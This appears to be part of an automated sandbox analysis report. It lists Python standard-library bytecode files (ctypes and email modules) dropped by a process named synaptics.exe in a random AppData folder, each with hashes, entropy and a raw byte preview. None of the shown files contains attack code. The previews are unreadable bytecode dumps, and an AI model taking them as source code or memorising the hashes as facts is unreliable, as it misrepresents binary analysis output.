                                                                                                                                                                                                            Preview:o.......Z.,d.7.......................@...s@...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.d.k.r"d.d...Z.d.d...Z.d.d...Z.noe.j.d.k.r7e.j.d.k.r7d.d.l.m.Z...d.d...Z.nZe.j...d...rDd.d.l.m.Z...nMe.j.d.k.r.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.e.j.d.k.rcd.d...Z.n.d.d...Z.e.j...d...rvd.d...Z.d.d...Z.n.e.j.d.k.r.d.d...Z.d'd.d...Z.n.d.d ..Z.d!d"..Z.d#d...Z.d$d%..Z.e.d&k.r.e.....d.S.d.S.)(.....N..ntc....................C...s....d.}.t.j...|...}.|.d.k.r.d.S.|.t.|.....}.t.j.|.d.......d.d...\.}.}.t.|.d.d.......d...}.|.d.k.r3|.d.7.}.t.|.d.d.......d...}.|.d.k.rCd.}.|.d.k.rK|.|...S.d.S.).z.Return the version of MSVC that was used to build Python... For Python 2.3 and up, the version number is included in. sys.version. For earlier versions, assume the compiler is MSVC 6.. z.MSC v...........N.. .........................g......$@r....)...sys..version..find..len..split..int)...prefix..i..s..restZ.majorVersionZ.minorVersion..r.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\ctypes\util.py.._get_bui
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4882
                                                                                                                                                                                                            Entropy (8bit):5.54561054170433
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9n7SgQvVTrUEb2DHdwyeOXd97wUah1VWyGPTYPrVgI+AxROhOFPN:9n6VTAEb2DH+yZXjw7h1VWJSZe2N
                                                                                                                                                                                                            MD5:1CCBD457E86A4BA8D9DBBBDA295BDEFD
                                                                                                                                                                                                            SHA1:CA0CE475D546FB79D774E578438F38E4F838E829
                                                                                                                                                                                                            SHA-256:1131DE1922112F686BF7174C8882F1F7BAC2C5E1B2DC1C8CC5B72299CDCF65BB
                                                                                                                                                                                                            SHA-512:06ED33CFF591F51C36D8EC536F2F51E8350C37F79038BF735B043606695AFE6E053191B8F857714285E03665C5BB1D68FDCCA349742E13E30C30A1916592189A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.d.l.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.e.j...Z.Z.e.j ..Z!Z"e.j#..Z$..Z%Z&e.j#..Z'Z(e.j)..Z*Z+e.j,..Z-Z.e../e.j...e../e.j,..k.rle.j.Z0e.j.Z1n.e../e.j...e../e.j,..k.r~e.j Z0e.j.Z1e.Z2e.Z3e.Z4e.Z5e.Z6e.Z7e.j,Z8e8Z9e8Z:e8Z;e8Z<e8Z=e8Z>e8Z?e8Z@e8ZAe8ZBe8ZCe8ZDe8ZEe8ZFe8ZGe8ZHe8ZIe8ZJe8ZKe8ZLe8ZMe8ZNe8ZOe8ZPe8ZQe8ZRe8ZSe8ZTe8ZUe8ZVe8ZWG.d.d...d.e.jX..ZYeY..ZZ..Z[Z\G.d.d...d.e.jX..Z]e]Z^G.d.d...d.e.jX..Z_G.d.d...d.e.jX..Z`e`..Za..ZbZcG.d.d...d.e.jX..Zded..ZeZfd.d...ZgG.d.d...d.e.jX..ZhehZiG.d.d...d.e.jX..ZjejZkd.ZlG.d.d...d.e.jX..ZmG.d.d...d.e.jX..Zne..oe.....ZpZqe..oe...Zre..oe.....ZsZte..oe...Zue..oe4..Zve..oe.....ZwZxe..oeh....ZyZze..oe...Z{e..oe8....Z|Z}e..oeG..Z~e..oeH..Z.e..oe.....Z.Z.e..oe...Z.e..oe7..Z.e..oe.....Z.Z.e..oej....Z.Z.e..oe`....Z.Z.e..oec..Z.e..oeY....Z.Z.e..oe\....Z.Z.e..oeV..Z.e..oe...Z.e..oed....Z.Z.e..oef....Z.Z.e..oe^..Z.e..oe.....Z.Z.e..oe"..Z.e..o
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1584
                                                                                                                                                                                                            Entropy (8bit):4.918443694359967
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:lvwQTrfch6OD9tLNoe0ThNVAH4N6rqNkh8O:lprfch6OloBLWo6rWk+O
                                                                                                                                                                                                            MD5:AE49C17489D29A1471881D8204F8682D
                                                                                                                                                                                                            SHA1:2E6791539BC0AA71CEB7829713DF18F061D9C8D9
                                                                                                                                                                                                            SHA-256:DBE8DA45641724C8FA7887D7621BACD0405CD3E681C610671893431F9ACE7414
                                                                                                                                                                                                            SHA-512:2CF949E56E82A8D501682626B1AA6759B8EDD862324131B66B99C4FCBD91EA263173A23C31F10DA58565E6042D9C24FEDAE6DAD18CBD9879B946BD292A4D2E3C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d$........................@...s0...d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z?A package for parsing, handling, and generating email messages.).Z.base64mime..charsetZ.encoders..errorsZ.feedparser..generator..headerZ.iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytesZ.mimeZ.parserZ.quoprimime..utilsc....................O.... ...d.d.l.m.}...|.|.i.|.......|...S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr....Z.parsestr)...s..args..kwsr......r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\__init__.pyr.... ............r....c....................O...r....).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r........BytesParser).r....r....Z.parsebytes).r....r....r....r....r....r....r....r....(...r....r....c....................O...r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5764
                                                                                                                                                                                                            Entropy (8bit):5.420643949632235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:9OU9w0nkhN4XpaTzT797ta3T8qCpjjRtfklxvvp/qLfrg8NNOGbM//qH1uqs:dWN0UHy8h7fOvh/WgGN6XqHkqs
                                                                                                                                                                                                            MD5:9C52859FE97AB9BFB46393BA3BE9C904
                                                                                                                                                                                                            SHA1:88B1AA323DFD2C7DB01EF9C83497E5356B47A8DE
                                                                                                                                                                                                            SHA-256:4CD1CF068DA95D5B22FFB3D2E87E649F48BA13C29A199F62C583E8CEA5847BCD
                                                                                                                                                                                                            SHA-512:FC17ADD03DC7079E6DC988DF5491827552D8DD2AB07CCA5997AECCE6077367A4F53A63555997F7C5B1B20CA806F8AEB157DD6E1757C5058B9630F044A751ADC9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dF".......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z.e...e...d...j.d.d.....Z.d.d...Z.G.d.d...d.e...Z.e...Z.d.e.e.d...<.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.e.d...Z.d.d...Z.e.e.d...Z.e.e.d...Z.d d.d...Z.d.S.)!z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c....................C...s....t...|...d.........S.).N.....)...bytes..fromhex..groupr....)...m..r.....CC:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\_encoded_words.py..<lambda>A...s......r....c....................C...s....|...d.d...}.t.|...g.f.S.).N....._..... )...replace.._q_byte_subber)...encodedr....r....r....r....C...s........r....c....................@...s,...e.Z.d.Z.d.e...d.....e...d.....Z.d.d...Z.d.S.)..._
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12536
                                                                                                                                                                                                            Entropy (8bit):5.369508704534582
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:38lfoaBPanIUGehShaPvqfaXJcCMr7UaZbWMFltbgKBk0:slgyMGePP+7Ua0MpG0
                                                                                                                                                                                                            MD5:0656409F8D1E1638D99BDB96B5FAE5D0
                                                                                                                                                                                                            SHA1:F510BF47EC0B9E91494651A0C19459DBC0D8E3E7
                                                                                                                                                                                                            SHA-256:C51969DE8C54204D0DFA084402DAE3BE84C65424CE7176AADA5408FB3371FB60
                                                                                                                                                                                                            SHA-512:BCCFE602736BC308D6E28DEFAE444D5772B18AA34A237E9E9C682D3A5FC2B8E5C419DC91F01218956C5E57378D8F669375FB46780AD692656AE1BD44C6DBD6A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.G.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., ).Z.janZ.febZ.marZ.apr..mayZ.junZ.julZ.aug..sep..octZ.novZ.decZ.januaryZ.februaryZ.marchZ.aprilr....Z.juneZ.julyZ.augustZ.septemberZ.octoberZ.novemberZ.december).Z.monZ.tueZ.wedZ.thuZ.friZ.satZ.sunip...i....i....i....iD...i....).Z.UTZ.UTC..GMT..ZZ.ASTZ.ADTZ.ESTZ.EDTZ.CSTZ.CDTZ.MSTZ.MDTZ.PSTZ.PDTc....................C...s,...t.|...}.|.s.d.S.|.d...d.u.r.d.|.d.<.t.|...S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..res..r.....?C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\_parseaddr.pyr....-...s................r....c....................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14806
                                                                                                                                                                                                            Entropy (8bit):5.055537558362915
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Gbtx+rovk6H2JvwhY1jaF7AyJAeb7AqDNF/EIRDAysM1Jd/GaOkdlL7+WpSla/AB:Gbt+oM6H8vPiJAqVDApM1jeaOMh7G5rl
                                                                                                                                                                                                            MD5:7BFF144CD550CC36015DA2009E9472E7
                                                                                                                                                                                                            SHA1:FF01F808B465988B7AE1A6FBBAB74805CFE74C61
                                                                                                                                                                                                            SHA-256:19B80D9511248AB7B1235A9EBF03D873664B9CF7F30209EA8446606DB3B87F61
                                                                                                                                                                                                            SHA-512:02D7848718EC122A886E216E4246838A39666367A33EA9D586A0DB1637BCD3503A9EC9E0F771693B48897CC2D66E3194DE1773177694D523ED7AFF015EF189C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dW<.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.G.d.d...d.e.e.j.d...Z.e.G.d.d...d.e.....Z.e...Z.d.S.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c........................s@...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance except for those values changed.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3264
                                                                                                                                                                                                            Entropy (8bit):5.388130524617021
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:TFLsbReNFxr32QSaR+Eiig25FNV78ojIu:5Lsle3rhjn5F5
                                                                                                                                                                                                            MD5:63B1BA6D142681F89A1694D38FEDD35E
                                                                                                                                                                                                            SHA1:69784C51DFD84070A46090EE2C7609F6A6401323
                                                                                                                                                                                                            SHA-256:0C121CD27813D077E347E9E99497A47CEE7DE710C3C0F35AD5AF15342C426B61
                                                                                                                                                                                                            SHA-512:00CF84B1205ABC4C8F217C18BEA2F8B2BEA6A4434ABA4EFC29D258681B8A059E4D094A5795DA3F3ECAC6FC1B4D272E6C3035D1D059423C3DA6DA69CC77ED8083
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d^........................@...sl...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.e.f.d.d...Z.d.d...Z.e.Z.e.Z.d.S.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.dec
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11599
                                                                                                                                                                                                            Entropy (8bit):5.326128385674395
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:/71q2Qm6z+wYNW28DGmahcQx6Pk/pO5oU/5Ob9WJ//abe8+xGb/+w:z1ZRS+Z82yGRz/p2/5ObDbv+w
                                                                                                                                                                                                            MD5:897C3880A1DCFF09BEEC05D282B91E43
                                                                                                                                                                                                            SHA1:0CE701718B70294050D8723F18B7FAD5CB103AC0
                                                                                                                                                                                                            SHA-256:CC6527A1C339C0D791E2C96C7C1C9994D453271BCC73F71695EBC32B9F9FF5B0
                                                                                                                                                                                                            SHA-512:B73C084C49DB271B88E4E0C6A0E42673589D51AA5F126B6C9052CE8EEF47A53761DD80735A6D1A1817FC8A036CE68636A01463084384455C7D8EAD10409FEF6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d|D.......................@...s....g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8d9..Z.d:d;..Z.d<d=..Z.d>d?..Z.G.d@dA..dA..Z.d.S.)B)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252Z.viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1Z.latin_2z.latin-2Z.latin_3z.latin-3Z.latin_4z.latin-4Z.latin_
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1651
                                                                                                                                                                                                            Entropy (8bit):5.1031500268843795
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:lGy7gaTT5rqICrNt7xAffWuNXwQFd9EGZvPJ5rJxEwkJpDkvyz3:lG/9ht7mfWEgQFYSvrEDkvyz3
                                                                                                                                                                                                            MD5:6E3558DD6D15B7E41F5F6A6B77F7D190
                                                                                                                                                                                                            SHA1:1C9076F2044B6B8B8F9F62E5CD3BFC385B8E0EB4
                                                                                                                                                                                                            SHA-256:2E7A8E6EAC58C37BE767F94346C8A85E28BD3C88007ECAA37717302822F4F09D
                                                                                                                                                                                                            SHA-512:FD4703C0A0D8ADE00121D1CE371E1E9525B31574DBA609B323424D88E50B4D8B0CF42C11601D7403479E9BB01613EFBC44A8CD36D1DC6950575EEDDC83355C8C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d?........................@...sP...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc....................C...s....t.|.d.d...}.|...d.d...S.).NT).Z.quotetabs..... s....=20)..._encodestring..replace)...s..enc..r.....=C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\encoders.py.._qencode....s........r....c....................C...s0...|.j.d.d...}.t.t.|...d...}.|...|.....d.|.d.<.d.S.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..origZ.encdatar....r....r....r........s............r....c....................C...s*...|.j.d.d...}.t.|...}.|...|.....d.|.d.<.d.S.).zvEncode the message's payload in quoted-printable... Also, add an appropriate Content-Transfe
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5726
                                                                                                                                                                                                            Entropy (8bit):4.742152793628666
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:pYI+E7YT1Z7Q6ELjeDJ87gw1aXJE6iqFoARF3IloR/Qg1pDX4Qmbsru3m:pYTEOZQJ2DJ87gtXJniqn3IeWQCQmbsz
                                                                                                                                                                                                            MD5:49A03A297AAA647E1535E1049F77B043
                                                                                                                                                                                                            SHA1:D68B674D0028BD91EF94C92E066AA32EC51F035D
                                                                                                                                                                                                            SHA-256:0A4EE2A72C125F9BF6785459CB2626FDA9E889E54FBE3F9F1E594A8EC6BF2ADA
                                                                                                                                                                                                            SHA-512:BCEC113E0E74C2F208C1E493899E92304F1EA8C92448B856872FC1A59C65EEB43D639BA2F458F02127D4229F32C06A9E03653821914F770E0E0524C149097F41
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e...Z.G.d+d,..d,e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e...Z.d5S.)6z email package exception classes.c....................@........e.Z.d.Z.d.Z.d.S.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__..r....r.....;C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\errors.pyr.................r....c....................@...r....)...MessageParseErrorz&Base class for message parsing errors.Nr....r....r....r....r....r........r....r....c....................@...r....)...HeaderParseErrorz.Error while parsing headers.Nr....r....r....r....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10602
                                                                                                                                                                                                            Entropy (8bit):5.449969430415304
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zQt3lEmz0KYgjRm95weZd6S3DFKTbefqi0G332hjD8gK1W:MtVEC0KYr5weZJ3DFSbeiu329D8j1W
                                                                                                                                                                                                            MD5:8FB5FAFB327FE3A9C2FA79E0FD01ED68
                                                                                                                                                                                                            SHA1:CAE260438432320680DFBF5DC9B0EE56630778E4
                                                                                                                                                                                                            SHA-256:353A83D360BD6ACB4ACC7F067D7EAE369B0FA5D8893CEACA61C3BD92FC607B30
                                                                                                                                                                                                            SHA-512:95528F84F8A23D531680E34FDE6EC93ADC4CBB6702175D4DADBED2EB56D5535D09B84A8F288938CDB6FBAFB7EFDFAB2A89193CC44725D8DD7F9ABACAAF32FBB2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.[.......................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e...d...Z.d.Z.d.Z.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead, when it finds something unexpected, it adds a 'defect' to.the current message. Defects are just instances that live on the message.object's .defects a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16486
                                                                                                                                                                                                            Entropy (8bit):5.358464602983951
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:6EojVd0yA82fSNCT4HPb/bl36D/7FCjIMIlaTamNjHMSuXi90MXh:6EL/8SScT4vb168cMXh
                                                                                                                                                                                                            MD5:1A5A0D33AF4AD482DFEF6D8FBCDEA152
                                                                                                                                                                                                            SHA1:58FC29933400EBEC861544C4536D03E95A17F1A8
                                                                                                                                                                                                            SHA-256:5AFA9040E3B2F4C22DA143811729C9D6D790C004FB980E1D5D69C4B3B07E23F6
                                                                                                                                                                                                            SHA-512:768B8A08E848109AE37F4714543EEB519E030FEA1243A4662FA0153C29B032CB22D1BFD19102CF50D4D4E64C3EC278A611665C68853DB884BB1FC064E8D744A9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dh`.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d...Z.e.d...Z.e...d.e.j.e.j.B...Z.e...d...Z.e...d...Z.e.j.j.Z.d.d...Z.....d.d.d...Z.G.d.d...d...Z.G.d.d...d...Z G.d.d...d.e!..Z"d.S.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?= # literal ?=. z.[\041-\176]+:$z.\n[^ \t]+:c....................C...s....t.|.d...r.d.d...|.j.D...S.t...|...s.|.d.f.g.S.g.}.|.....D.]A}.t...|...}.d.}.|.r^|...d...}.|.r5|.....}.d.}.|.r?|...|.d.d.f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1992
                                                                                                                                                                                                            Entropy (8bit):5.346255600125508
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l4UhA49ILWjxgYOzvfOoUFQLfMbhoJ9t1eYG1lGLG+hEl9:CUrIWd+5UFsMbhOQGTEl9
                                                                                                                                                                                                            MD5:BE90DF111912225FD87CC6E355CC6BE6
                                                                                                                                                                                                            SHA1:E0C3E63267F9E1247192F4173FEEF6183E04A2CD
                                                                                                                                                                                                            SHA-256:29145CB574160BBFC1DF0F55CD0F06938AD2A40FEB9A0C22D31AD879463883AC
                                                                                                                                                                                                            SHA-512:BA2A1C61278AA9721DEC763893C541F354BE86ABFC367C48782ACA1963C2E898CD5295C64E9E5ADB1DD3AD2937756DD973D2609A5E627ED989774D97574244EB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sJ...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc....................c...s4.....|.V...|.....r.|.....D.].}.|.....E.d.H...q.d.S.d.S.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subpart..r.....>C:\Users\user\AppData\Local\xFSOj9El1Q\lib\email\iterators.pyr........s..................r....Fc....................c...s8.....|.....D.].}.|.j.|.d...}.t.|.t...r.t.|...E.d.H...q.d.S.).z.Iterate over the parts, returning string payloads line-by-line... Optional decode (default False) is passed through to .get_payload().. )...decodeN).r....r......isinstance..strr....)...msgr....r......payloadr....r....r....r...."...s..................r......textc...................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):37828
                                                                                                                                                                                                            Entropy (8bit):5.2968435479055715
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:x3vKre029TBAXUyI2U7AqvYEO9cI9oyCoie5hoDEL:VvN029TSUr2cAqJOyI9o7oiYL
                                                                                                                                                                                                            MD5:E77144FD0ED4E95ECE31384A8383CDB1
                                                                                                                                                                                                            SHA1:95D3363D66AEC8682054DF3ED8FD56B705899979
                                                                                                                                                                                                            SHA-256:538298E12D71365CC9831F03506A7867F0C7CFF8F5A11716523C66742E0CB133
                                                                                                                                                                                                            SHA-512:8B1F0550D99CF62021B77B06EAA4A7DB438EA249BCF25B2713F39A760E6F649133CDE295C84BB8E96B461E3D6DEFAB8D0FC78C849394040DB3CF4B9671B90E4C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
